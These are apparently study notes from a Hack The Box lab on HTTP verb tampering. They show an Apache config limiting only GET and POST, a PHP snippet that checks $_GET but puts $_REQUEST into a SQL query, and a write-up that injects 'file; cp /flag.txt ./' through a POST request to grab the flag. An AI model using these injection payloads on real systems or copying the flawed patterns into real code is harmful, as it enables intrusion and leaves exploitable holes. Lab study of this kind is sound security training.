Insecure configs

Example:

<Limit GET POST>
    Require valid-user
</Limit>

Here an unauth attacker may use other methods to access pages (HEAD, PUT…)

Example:

$pattern = "/^[A-Za-z\\s]+$/";

if(preg_match($pattern, $_GET["code"])) {
    $query = "Select * from ports where port_code like '%" . $_REQUEST["code"] . "%'";
    ...SNIP...
}

Here, only GET params params will be in $_GET, but, we may use POST params and the query will not be checked.

Writeup - Bypassing Security Filters

To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./

We must use Python to put our args in POST instead of PUT

requests.post("<http://83.136.255.235:54626/index.php>", data={"filename": "zob; cp /flag.txt \\
."}).text

→ HTB{b3_v3rb_c0n51573n7}